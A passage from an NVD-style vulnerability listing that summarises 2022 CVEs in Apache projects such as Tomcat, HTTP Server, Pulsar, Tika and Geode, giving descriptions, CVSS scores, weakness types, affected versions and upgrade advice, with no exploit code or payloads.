nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N 2.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache archiva *
CVE-2022-29599 HIGH

In Apache Maven maven-shared-utils prior to version 3.3.3, the Commandline class can emit double-quoted strings without proper escaping, allowing shell injection attacks.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-116,CWE-116,

Products Affected

Vendor Product Version
debian debian_linux 10.0
apache maven_shared_utils *
debian debian_linux 11.0
CVE-2022-29885 MEDIUM

The documentation of Apache Tomcat 10.1.0-M1 to 10.1.0-M14, 10.0.0-M1 to 10.0.20, 9.0.13 to 9.0.62 and 8.5.38 to 8.5.78 for the EncryptInterceptor incorrectly stated it enabled Tomcat clustering to run over an untrusted network. This was not correct. While the EncryptInterceptor does provide confidentiality and integrity protection, it does not protect against all risks associated with running over any untrusted network, particularly DoS risks.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-400,NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 10.1.0
oracle hospitality_cruise_shipboard_property_management_system 20.2.1
debian debian_linux 10.0
debian debian_linux 11.0
CVE-2022-30126 MEDIUM

In Apache Tika, a regular expression in our StandardsText class, used by the StandardsExtractingContentHandler could lead to a denial of service caused by backtracking on a specially crafted file. This only affects users who are running the StandardsExtractingContentHandler, which is a non-standard handler. This is fixed in 1.28.2 and 2.4.0

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H 1.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
oracle primavera_unifier 20.12
oracle primavera_unifier 19.12
oracle primavera_unifier 21.12
apache tika *
oracle primavera_unifier *
oracle primavera_unifier 18.8
CVE-2022-30522 MEDIUM

If Apache HTTP Server 2.4.53 is configured to do transformations with mod_sed in contexts where the input to mod_sed may be very large, mod_sed may make excessively large memory allocations and trigger an abort.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-789,CWE-770,

Products Affected

Vendor Product Version
fedoraproject fedora 35
apache http_server 2.4.53
fedoraproject fedora 36
netapp clustered_data_ontap -
CVE-2022-30556 MEDIUM

Apache HTTP Server 2.4.53 and earlier may return lengths to applications calling r:wsread() that point past the end of the storage allocated for the buffer.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,NVD-CWE-Other,

Products Affected

Vendor Product Version
fedoraproject fedora 35
apache http_server *
fedoraproject fedora 36
netapp clustered_data_ontap -
CVE-2022-30973 LOW

We failed to apply the fix for CVE-2022-30126 to the 1.x branch in the 1.28.2 release. In Apache Tika, a regular expression in the StandardsText class, used by the StandardsExtractingContentHandler could lead to a denial of service caused by backtracking on a specially crafted file. This only affects users who are running the StandardsExtractingContentHandler, which is a non-standard handler. This is fixed in 1.28.3.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H 1.8 3.6

CVSS 2.0

Severity: LOW

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tika *
CVE-2022-31764

The Lite UI of Apache ShardingSphere ElasticJob-UI allows an attacker to perform RCE by constructing a special JDBC URL of H2 database. This issue affects Apache ShardingSphere ElasticJob-UI version 3.0.1 and prior versions. This vulnerability has been fixed in ElasticJob-UI 3.0.2. The premise of this attack is that the attacker has obtained the account and password. Otherwise, the attacker cannot perform this attack.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.5 HIGH CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H 1.8 6.0

Products Affected

Vendor Product Version
apache shardingsphere_elasticjob-ui *
CVE-2022-31777

A stored cross-site scripting (XSS) vulnerability in Apache Spark 3.2.1 and earlier, and 3.3.0, allows remote attackers to execute arbitrary JavaScript in the web browser of a user, by including a malicious payload into the logs which would be returned in logs rendered in the UI.

Products Affected

Vendor Product Version
apache spark 3.3.0
apache spark *
CVE-2022-31778

Improper Input Validation vulnerability in handling the Transfer-Encoding header of Apache Traffic Server allows an attacker to poison the cache. This issue affects Apache Traffic Server 8.0.0 to 9.0.2.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache traffic_server *
debian debian_linux 11.0
CVE-2022-31779

Improper Input Validation vulnerability in HTTP/2 header parsing of Apache Traffic Server allows an attacker to smuggle requests. This issue affects Apache Traffic Server 8.0.0 to 9.1.2.

Products Affected

Vendor Product Version
fedoraproject fedora 35
fedoraproject fedora 36
apache traffic_server *
debian debian_linux 11.0
CVE-2022-31780

Improper Input Validation vulnerability in HTTP/2 frame handling of Apache Traffic Server allows an attacker to smuggle requests. This issue affects Apache Traffic Server 8.0.0 to 9.1.2.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

Products Affected

Vendor Product Version
fedoraproject fedora 35
fedoraproject fedora 36
debian debian_linux 10.0
apache traffic_server *
debian debian_linux 11.0
CVE-2022-31781

Apache Tapestry up to version 5.8.1 is vulnerable to Regular Expression Denial of Service (ReDoS) in the way it handles Content Types. Specially crafted Content Types may cause catastrophic backtracking, taking exponential time to complete. Specifically, this is about the regular expression used on the parameter of the org.apache.tapestry5.http.ContentType class. Apache Tapestry 5.8.2 has a fix for this vulnerability. Notice the vulnerability cannot be triggered by web requests in Tapestry code alone. It would only happen if there's some non-Tapestry codepath passing some outside input to the ContentType class constructor.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache tapestry *
CVE-2022-31813 HIGH

Apache HTTP Server 2.4.53 and earlier may not send the X-Forwarded-* headers to the origin server based on client side Connection header hop-by-hop mechanism. This may be used to bypass IP based authentication on the origin server/application.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-348,CWE-345,

Products Affected

Vendor Product Version
fedoraproject fedora 35
apache http_server *
fedoraproject fedora 36
netapp clustered_data_ontap -
CVE-2022-32287

A relative path traversal vulnerability in a FileUtil class used by the PEAR management component of Apache UIMA allows an attacker to create files outside the designated target directory using carefully crafted ZIP entry names. This issue affects Apache UIMA Apache UIMA version 3.3.0 and prior versions. Note that PEAR files should never be installed into an UIMA installation from untrusted sources because PEAR archives are executable plugins that will be able to perform any actions with the same privileges as the host Java Virtual Machine.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache uimaj *
CVE-2022-32531

The Apache Bookkeeper Java Client (before 4.14.6 and also 4.15.0) does not close the connection to the bookkeeper server when TLS hostname verification fails. This leaves the bookkeeper client vulnerable to a man in the middle attack. The problem affects BookKeeper client prior to versions 4.14.6 and 4.15.1.

Products Affected

Vendor Product Version
apache bookkeeper *
apache bookkeeper 4.15.0
CVE-2022-32532 HIGH

Apache Shiro before 1.9.1, A RegexRequestMatcher can be misconfigured to be bypassed on some servlet containers. Applications using RegExPatternMatcher with `.` in the regular expression are possibly vulnerable to an authorization bypass.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-863,CWE-863,

Products Affected

Vendor Product Version
apache shiro *
CVE-2022-32533 HIGH

Apache Jetspeed-2 does not sufficiently filter untrusted user input by default leading to a number of issues including XSS, CSRF, XXE, and SSRF. Setting the configuration option "xss.filter.post = true" may mitigate these issues. NOTE: Apache Jetspeed is a dormant project of Apache Portals and no updates will be provided for this issue

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-79,NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache jetspeed *
CVE-2022-32549 MEDIUM

Apache Sling Commons Log <= 5.4.0 and Apache Sling API <= 2.25.0 are vulnerable to log injection. The ability to forge logs may allow an attacker to cover tracks by injecting fake logs and potentially corrupt log files.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-117,CWE-116,

Products Affected

Vendor Product Version
apache sling_api *
apache sling_commons_log *
CVE-2022-32749

Improper Check for Unusual or Exceptional Conditions vulnerability handling requests in Apache Traffic Server allows an attacker to crash the server under certain conditions. This issue affects Apache Traffic Server: from 8.0.0 through 9.1.3.

Products Affected

Vendor Product Version
apache traffic_server *
CVE-2022-33140 MEDIUM

The optional ShellUserGroupProvider in Apache NiFi 1.10.0 to 1.16.2 and Apache NiFi Registry 0.6.0 to 1.16.2 does not neutralize arguments for group resolution commands, allowing injection of operating system commands on Linux and macOS platforms. The ShellUserGroupProvider is not included in the default configuration. Command injection requires ShellUserGroupProvider to be one of the enabled User Group Providers in the Authorizers configuration. Command injection also requires an authenticated user with elevated privileges. Apache NiFi requires an authenticated user with authorization to modify access policies in order to execute the command. Apache NiFi Registry requires an authenticated user with authorization to read user groups in order to execute the command. The resolution removes command formatting based on user-provided arguments.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-78,CWE-78,

Products Affected

Vendor Product Version
apache nifi_registry *
apache nifi *
CVE-2022-33681

Delayed TLS hostname verification in the Pulsar Java Client and the Pulsar Proxy make each client vulnerable to a man in the middle attack. Connections from the Pulsar Java Client to the Pulsar Broker/Proxy and connections from the Pulsar Proxy to the Pulsar Broker are vulnerable. Authentication data is sent before verifying the server’s TLS certificate matches the hostname, which means authentication data could be exposed to an attacker. An attacker can only take advantage of this vulnerability by taking control of a machine 'between' the client and the server. The attacker must then actively manipulate traffic to perform the attack by providing the client with a cryptographically valid certificate for an unrelated host. Because the client sends authentication data before performing hostname verification, an attacker could gain access to the client’s authentication data. The client eventually closes the connection when it verifies the hostname and identifies the targeted hostname does not match a hostname on the certificate. Because the client eventually closes the connection, the value of the intercepted authentication data depends on the authentication method used by the client. Token based authentication and username/password authentication methods are vulnerable because the authentication data can be used to impersonate the client in a separate session. This issue affects Apache Pulsar Java Client versions 2.7.0 to 2.7.4; 2.8.0 to 2.8.3; 2.9.0 to 2.9.2; 2.10.0; 2.6.4 and earlier.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N 2.2 3.6

Products Affected

Vendor Product Version
apache pulsar *
apache pulsar 2.10.0
CVE-2022-33682

TLS hostname verification cannot be enabled in the Pulsar Broker's Java Client, the Pulsar Broker's Java Admin Client, the Pulsar WebSocket Proxy's Java Client, and the Pulsar Proxy's Admin Client leaving intra-cluster connections and geo-replication connections vulnerable to man in the middle attacks, which could leak credentials, configuration data, message data, and any other data sent by these clients. The vulnerability is for both the pulsar+ssl protocol and HTTPS. An attacker can only take advantage of this vulnerability by taking control of a machine 'between' the client and the server. The attacker must then actively manipulate traffic to perform the attack by providing the client with a cryptographically valid certificate for an unrelated host. This issue affects Apache Pulsar Broker, Proxy, and WebSocket Proxy versions 2.7.0 to 2.7.4; 2.8.0 to 2.8.3; 2.9.0 to 2.9.2; 2.10.0; 2.6.4 and earlier.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N 2.2 3.6

Products Affected

Vendor Product Version
apache pulsar *
apache pulsar 2.10.0
CVE-2022-33683

Apache Pulsar Brokers and Proxies create an internal Pulsar Admin Client that does not verify peer TLS certificates, even when tlsAllowInsecureConnection is disabled via configuration. The Pulsar Admin Client's intra-cluster and geo-replication HTTPS connections are vulnerable to man in the middle attacks, which could leak authentication data, configuration data, and any other data sent by these clients. An attacker can only take advantage of this vulnerability by taking control of a machine 'between' the client and the server. The attacker must then actively manipulate traffic to perform the attack. This issue affects Apache Pulsar Broker and Proxy versions 2.7.0 to 2.7.4; 2.8.0 to 2.8.3; 2.9.0 to 2.9.2; 2.10.0; 2.6.4 and earlier.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N 2.2 3.6

Products Affected

Vendor Product Version
apache pulsar *
apache pulsar 2.10.0
CVE-2022-33684

The Apache Pulsar C++ Client does not verify peer TLS certificates when making HTTPS calls for the OAuth2.0 Client Credential Flow, even when tlsAllowInsecureConnection is disabled via configuration. This vulnerability allows an attacker to perform a man in the middle attack and intercept and/or modify the GET request that is sent to the ClientCredentialFlow 'issuer url'. The intercepted credentials can be used to acquire authentication data from the OAuth2.0 server to then authenticate with an Apache Pulsar cluster. An attacker can only take advantage of this vulnerability by taking control of a machine 'between' the client and the server. The attacker must then actively manipulate traffic to perform the attack. The Apache Pulsar Python Client wraps the C++ client, so it is also vulnerable in the same way. This issue affects Apache Pulsar C++ Client and Python Client versions 2.7.0 to 2.7.4; 2.8.0 to 2.8.3; 2.9.0 to 2.9.2; 2.10.0 to 2.10.1; 2.6.4 and earlier. Any users running affected versions of the C++ Client or the Python Client should rotate vulnerable OAuth2.0 credentials, including client_id and client_secret. 2.7 C++ and Python Client users should upgrade to 2.7.5 and rotate vulnerable OAuth2.0 credentials. 2.8 C++ and Python Client users should upgrade to 2.8.4 and rotate vulnerable OAuth2.0 credentials. 2.9 C++ and Python Client users should upgrade to 2.9.3 and rotate vulnerable OAuth2.0 credentials. 2.10 C++ and Python Client users should upgrade to 2.10.2 and rotate vulnerable OAuth2.0 credentials. 3.0 C++ users are unaffected and 3.0 Python Client users will be unaffected when it is released. Any users running the C++ and Python Client for 2.6 or less should upgrade to one of the above patched versions.

Products Affected

Vendor Product Version
apache pulsar *
CVE-2022-33879 LOW

The initial fixes in CVE-2022-30126 and CVE-2022-30973 for regexes in the StandardsExtractingContentHandler were insufficient, and we found a separate, new regex DoS in a different regex in the StandardsExtractingContentHandler. These are now fixed in 1.28.4 and 2.4.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 3.3 LOW CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L 1.8 1.4

CVSS 2.0

Severity: LOW

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tika *
CVE-2022-33891

The Apache Spark UI offers the possibility to enable ACLs via the configuration option spark.acls.enable. With an authentication filter, this checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow someone to perform impersonation by providing an arbitrary user name. A malicious user might then be able to reach a permission check function that will ultimately build a Unix shell command based on their input, and execute it. This will result in arbitrary shell command execution as the user Spark is currently running as. This affects Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache spark *
CVE-2022-33980 HIGH

Apache Commons Configuration performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is "${prefix:name}", where "prefix" is used to locate an instance of org.apache.commons.configuration2.interpol.Lookup that performs the interpolation. Starting with version 2.4 and continuing through 2.7, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are: - "script" - execute expressions using the JVM script execution engine (javax.script) - "dns" - resolve dns records - "url" - load values from urls, including from remote servers Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used. Users are recommended to upgrade to Apache Commons Configuration 2.8.0, which disables the problematic interpolators by default.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache commons_configuration *
netapp snapcenter -
debian debian_linux 11.0
CVE-2022-34158

A carefully crafted invocation on the Image plugin could trigger an CSRF vulnerability on Apache JSPWiki before 2.11.3, which could allow a group privilege escalation of the attacker's account. Further examination of this issue established that it could also be used to modify the email associated with the attacked account, and then a reset password request from the login page.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache jspwiki *
CVE-2022-34169

The Apache Xalan Java XSLT library is vulnerable to an integer truncation issue when processing malicious XSLT stylesheets. This can be used to corrupt Java class files generated by the internal XSLTC compiler and execute arbitrary Java bytecode. Users are recommended to update to version 2.7.3 or later. Note: Java runtimes (such as OpenJDK) include repackaged copies of Xalan.

Products Affected

Vendor Product Version
azul zulu 6.47
azul zulu 13.48
oracle jre 17.0.3.1
oracle jre 11.0.15.1
azul zulu 8.62
oracle jre 1.8.0
azul zulu 7.55
oracle graalvm 20.3.6
netapp solidfire -
azul zulu 13.49
apache xalan-java *
oracle jre 1.7.0
netapp cloud_secure_agent -
netapp cloud_insights_acquisition_unit -
azul zulu 15.40
fedoraproject fedora 36
azul zulu 18.32
oracle openjdk 7
oracle openjdk 8
debian debian_linux 10.0
oracle jdk 17.0.3.1
oracle graalvm 21.3.2
azul zulu 15.41
fedoraproject fedora 35
oracle openjdk 18
azul zulu 8.64
azul zulu 17.35
azul zulu 13.50
netapp oncommand_insight -
azul zulu 11.57
netapp 7-mode_transition_tool -
oracle jdk 11.0.15.1
azul zulu 6.49
netapp hci_management_node -
netapp hci_compute_node -
oracle openjdk *
azul zulu 7.56
oracle jdk 1.8.0
azul zulu 8.63
azul zulu 7.54
oracle jdk 18.0.1.1
debian debian_linux 11.0
azul zulu 11.56
netapp active_iq_unified_manager -
azul zulu 11.58
oracle jdk 1.7.0
oracle jre 18.0.1.1
azul zulu 17.36
oracle graalvm 22.1.0
azul zulu 17.34
azul zulu 18.30
azul zulu 15.42
CVE-2022-34271

A vulnerability in import module of Apache Atlas allows an authenticated user to write to web server filesystem. This issue affects Apache Atlas versions from 0.8.4 to 2.2.0.

Products Affected

Vendor Product Version
apache atlas *
CVE-2022-34305 MEDIUM

In Apache Tomcat 10.1.0-M1 to 10.1.0-M16, 10.0.0-M1 to 10.0.22, 9.0.30 to 9.0.64 and 8.5.50 to 8.5.81 the Form authentication example in the examples web application displayed user provided data without filtering, exposing a XSS vulnerability.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,CWE-79,

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 10.1.0
CVE-2022-34321

Improper Authentication vulnerability in Apache Pulsar Proxy allows an attacker to connect to the /proxy-stats endpoint without authentication. The vulnerable endpoint exposes detailed statistics about live connections, along with the capability to modify the logging level of proxied connections without requiring proper authentication credentials. This issue affects Apache Pulsar versions from 2.6.0 to 2.10.5, from 2.11.0 to 2.11.2, from 3.0.0 to 3.0.1, and 3.1.0. The known risks include exposing sensitive information such as connected client IP and unauthorized logging level manipulation which could lead to a denial-of-service condition by significantly increasing the proxy's logging overhead. When deployed via the Apache Pulsar Helm chart within Kubernetes environments, the actual client IP might not be revealed through the load balancer's default behavior, which typically obscures the original source IP addresses when externalTrafficPolicy is being configured to "Cluster" by default. The /proxy-stats endpoint contains topic level statistics, however, in the default configuration, the topic level statistics aren't known to be exposed. 2.10 Pulsar Proxy users should upgrade to at least 2.10.6. 2.11 Pulsar Proxy users should upgrade to at least 2.11.3. 3.0 Pulsar Proxy users should upgrade to at least 3.0.2. 3.1 Pulsar Proxy users should upgrade to at least 3.1.1. Users operating versions prior to those listed above should upgrade to the aforementioned patched versions or newer versions. Additionally, it's imperative to recognize that the Apache Pulsar Proxy is not intended for direct exposure to the internet. The architectural design of Pulsar Proxy assumes that it will operate within a secured network environment, safeguarded by appropriate perimeter defenses.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 8.2 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L 3.9 4.2

Products Affected

Vendor Product Version
apache pulsar *
apache pulsar 3.1.0
CVE-2022-34662

When users add resources to the resource center with a relation path will cause path traversal issues and only for logged-in users. You could upgrade to version 3.0.0 or higher

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache dolphinscheduler *
CVE-2022-34870

Apache Geode versions up to 1.15.0 are vulnerable to a Cross-Site Scripting (XSS) via data injection when using Pulse web application to view Region entries.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N 2.3 2.7

Products Affected

Vendor Product Version
apache geode *
CVE-2022-34916

Apache Flume versions 1.4.0 through 1.10.0 are vulnerable to a remote code execution (RCE) attack when a configuration uses a JMS Source with a JNDI LDAP data source URI when an attacker has control of the target LDAP server. This issue is fixed by limiting JNDI to allow only the use of the java protocol or no protocol.

Products Affected

Vendor Product Version
apache flume *
CVE-2022-34917

A security vulnerability has been identified in Apache Kafka. It affects all releases since 2.8.0. The vulnerability allows malicious unauthenticated clients to allocate large amounts of memory on brokers. This can lead to brokers hitting OutOfMemoryException and causing denial of service. Example scenarios: - Kafka cluster without authentication: Any clients able to establish a network connection to a broker can trigger the issue. - Kafka cluster with SASL authentication: Any clients able to establish a network connection to a broker, without the need for valid SASL credentials, can trigger the issue. - Kafka cluster with TLS authentication: Only clients able to successfully authenticate via TLS can trigger the issue. We advise the users to upgrade the Kafka installations to one of the 3.2.3, 3.1.2, 3.0.2, 2.8.2 versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache kafka *
CVE-2022-35278

In Apache ActiveMQ Artemis prior to 2.24.0, an attacker could show malicious content and/or redirect users to a malicious URL in the web console by using HTML in the name of an address or queue.

Products Affected

Vendor Product Version
netapp active_iq_unified_manager -
apache activemq_artemis *
netapp oncommand_workflow_automation -
CVE-2022-35724

It is possible to provide data to be read that leads the reader to loop in cycles endlessly, consuming CPU. This issue affects Rust applications using Apache Avro Rust SDK prior to 0.14.0 (previously known as avro-rs). Users should update to apache-avro version 0.14.0 which addresses this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache avro *
CVE-2022-35741

Apache CloudStack version 4.5.0 and later has a SAML 2.0 authentication Service Provider plugin which is found to be vulnerable to XML external entity (XXE) injection. This plugin is not enabled by default and the attacker would require that this plugin be enabled to exploit the vulnerability. When the SAML 2.0 plugin is enabled in affected versions of Apache CloudStack could potentially allow the exploitation of XXE vulnerabilities. The SAML 2.0 messages constructed during the authentication flow in Apache CloudStack are XML-based and the XML data is parsed by various standard libraries that are now understood to be vulnerable to XXE injection attacks such as arbitrary file reading, possible denial of service, server-side request forgery (SSRF) on the CloudStack management server.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache cloudstack *
apache cloudstack 4.17.0.0
CVE-2022-36124

It is possible for a Reader to consume memory beyond the allowed constraints and thus lead to out of memory on the system. This issue affects Rust applications using Apache Avro Rust SDK prior to 0.14.0 (previously known as avro-rs). Users should update to apache-avro version 0.14.0 which addresses this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache avro *
CVE-2022-36125

It is possible to crash (panic) an application by providing a corrupted data to be read. This issue affects Rust applications using Apache Avro Rust SDK prior to 0.14.0 (previously known as avro-rs). Users should update to apache-avro version 0.14.0 which addresses this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache avro *
CVE-2022-36127

A vulnerability in Apache SkyWalking NodeJS Agent prior to 0.5.1. The vulnerability will cause NodeJS services that has this agent installed to be unavailable if the OAP is unhealthy and NodeJS agent can't establish the connection.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache skywalking_nodejs_agent *
apache skywalking *
CVE-2022-36364

Apache Calcite Avatica JDBC driver creates HTTP client instances based on class names provided via `httpclient_impl` connection property; however, the driver does not verify if the class implements the expected interface before instantiating it, which can lead to code execution loaded via arbitrary classes and in rare cases remote code execution. To exploit the vulnerability: 1) the attacker needs to have privileges to control JDBC connection parameters; 2) and there should be a vulnerable class (constructor with URL parameter and ability to execute code) in the classpath. From Apache Calcite Avatica 1.22.0 onwards, it will be verified that the class implements the expected interface before invoking its constructor.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache apache_calcite_avatica *
CVE-2022-36760

Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling') vulnerability in mod_proxy_ajp of Apache HTTP Server allows an attacker to smuggle requests to the AJP server it forwards requests to. This issue affects Apache HTTP Server Apache HTTP Server 2.4 version 2.4.54 and prior versions.

Products Affected

Vendor Product Version
apache http_server *
CVE-2022-37021

Apache Geode versions up to 1.12.5, 1.13.4 and 1.14.0 are vulnerable to a deserialization of untrusted data flaw when using JMX over RMI on Java 8. Any user still on Java 8 who wishes to protect against deserialization attacks involving JMX or RMI should upgrade to Apache Geode 1.15 and Java 11. If upgrading to Java 11 is not possible, then upgrade to Apache Geode 1.15 and specify "--J=-Dgeode.enableGlobalSerialFilter=true" when starting any Locators or Servers. Follow the documentation for details on specifying any user classes that may be serialized/deserialized with the "serializable-object-filter" configuration option. Using a global serial filter will impact performance.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache geode 1.14.0
apache geode *
CVE-2022-37022

Apache Geode versions up to 1.12.2 and 1.13.2 are vulnerable to a deserialization of untrusted data flaw when using JMX over RMI on Java 11. Any user wishing to protect against deserialization attacks involving JMX or RMI should upgrade to Apache Geode 1.15. Use of 1.15 on Java 11 will automatically protect JMX over RMI against deserialization attacks. This should have no impact on performance since it only affects JMX/RMI which Gfsh uses to communicate with the JMX Manager which is hosted on a Locator.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

